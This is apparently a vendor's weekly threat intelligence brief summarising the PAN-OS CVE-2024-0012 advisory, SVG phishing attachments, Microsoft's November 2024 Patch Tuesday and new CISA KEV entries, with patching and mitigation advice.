In this weekly Threat Intelligence Brief we look back at top stories and security-related callouts to provide relevant and actionable insights for the information security consumer.
We reference threat intelligence gained through our position as a security provider as well as industry sources in the development of this brief.
In this edition:
PAN-OS Authentication Bypass Vulnerability CVE-2024-0012
SVG attachments used to evade phishing detections
Microsoft November 2024 Patch Tuesday
CISA KEV updates
PAN-OS Authentication Bypass Vulnerability: CVE-2024-0012
Palo Alto Networks has released a security advisory covering CVE-2024-0012, an authentication bypass in PAN-OS management web interface. If exploited, this could lead to an attacker performing administrative actions, tampering with the configuration, or exploiting other authenticated privilege escalation vulnerabilities like CVE-2024-9474.
Palo Alto Networks has scanned for vulnerable devices with an internet-facing management interface and lists this information on the customer support portal https://support.paloaltonetworks.com. Once logged in, go to (Products → Assets → All Assets → Remediation Required), devices tagged with PAN-SA-2024-0015 have been found to have an internet-facing management interface.
Product Status 
Patches have been released and should be applied asap. Remediation guidance suggests limiting management interface access to known internal IPs. Please follow the linked source article for full workaround and mitigation guidance. You can also check the Coretek Blog for a more detailed threat advisory.
Source: Palo Alto Networks
SVG attachments used to evade phishing detections
Threat actors are leveraging the versatility of SVG files, which can display graphics, HTML, and execute JavaScript, to create phishing forms and distribute malware. These SVG attachments often bypass security software due to their textual nature, making them a growing concern for cybersecurity analysts.
A recent example of this technique was an attached SVG file which displayed a fake Excel spreadsheet. The fake sheet had a built-in login form, that when submitted, would send the entered data to responsible threat actors. It is important to note that SVG attachments are uncommon and should be treated by end users as suspicious..jpg?width=733&height=394&name=Threat%20Intel%20Brief%20for%20November%2011%20%20-%20November%2017%2c%202024%20(1).jpg)
Microsoft November 2024 Patch Tuesday
89 total vulnerabilities fixed, including 4 rated as critical severity. Affected products include Windows, Office, SQL Server, Azure, Dynamics and ESU.
2 actively exploited zero-day vulnerabilities patched, including:
CVE-2024-43451: NTLM Hash Disclosure Spoofing Vulnerability - CVSS 6.5
CVE-2024-49039: Windows Task Scheduler Elevation of Privilege Vulnerability - CVSS 8.8
Source: Microsoft Qualys
CISA KEV updates
CISA has added 7 new CVEs to their Known Exploited Vulnerability (KEV) catalog this week:
CVE-2021-26086 - Atlassian Jira Server and Data Center Path Traversal Vulnerability - CVSS 5.3
CVE-2014-2120 - Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability - CVSS 6.1
CVE-2021-41277 - Metabase GeoJSON API Local File Inclusion Vulnerability - CVSS 7.5
CVE-2024-42451 - Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability - CVSS 7.5
CVE-2024-49039 - Microsoft Windows Task Scheduler Privilege Escalation Vulnerability - CVSS 8.8
CVE-2024-9465 - Palo Alto Networks Expedition SQL Injection Vulnerability - CVSS 9.2
CVE-2024-9463 - Palo Alto Networks Expedition OS Command Injection Vulnerability - CVSS 9.9
Don't know where to begin with vulnerability management?
Using CISAs KEV catalog as a risk-based approach can be a great way to help prioritize vulnerability remediation in your organization. This link provides guidance on how to implement the KEV CISA.
Source: Known Exploited Vulnerabilities Catalog | CISA
Coretek's managed SOC/SIEM customers benefit from the latest threat intelligence. If you're interested in learning more about what Coretek can offer your organization, please reach out: https://coretek.com/contact